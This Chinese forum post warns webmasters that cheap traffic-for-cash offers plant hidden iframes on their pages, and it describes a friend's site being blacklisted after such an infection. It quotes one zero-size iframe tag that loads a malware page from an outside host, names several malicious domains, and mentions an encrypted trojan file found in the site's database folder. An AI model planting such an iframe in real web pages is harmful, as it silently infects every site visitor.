不知道大家注意到没有,一些站上打广告说,1万个IP给60元RMB, 原来是这样的事情,今天才知道了
1万个IP 60元RMB,是对方让你在网页内挂个iframe ,这个ifreame网址里包含病毒木马,当访客访问你站打开的同时,这个iframe里面的网页也被打开,由于iframe里的网址有病毒木马,打开就就会报有毒!!
今天上午一个朋友的站 www.windowso.com 他说就因为这关了1个礼拜。而且还被GG列为病毒网站的行列,打入地狱,流量持续下降。 他告诉我, 他大多的.asp 和htm 页中被包含:
<iframe src="http://s.gcuj.com/bd.htm?019" width="0" height="0" frameborder="0"></iframe>
http://q.scanreg.cn/a/adv.htm 还有以 “mm5211314.cn senlove.cn”为结尾的恶意站
大家都看清楚了, 如果你的网页内哪天莫名其妙的发现有以上的代码,你得小心注意了。 可能被人挂马了
那么他们是如何挂上去的呢?检查DATE数据库下:惊奇的发现有个“ymda.asa”这样的文件,打开一看:是已经被加秘的病毒木马!!
有经验的人说,把该文件清空,但是文件夹不要删除。
上次这个站已经被挂了一次,没到2天又被。。。。 就看这次的这个方法了。。
再这里呼吁广大种马的人,放手吧。。。。
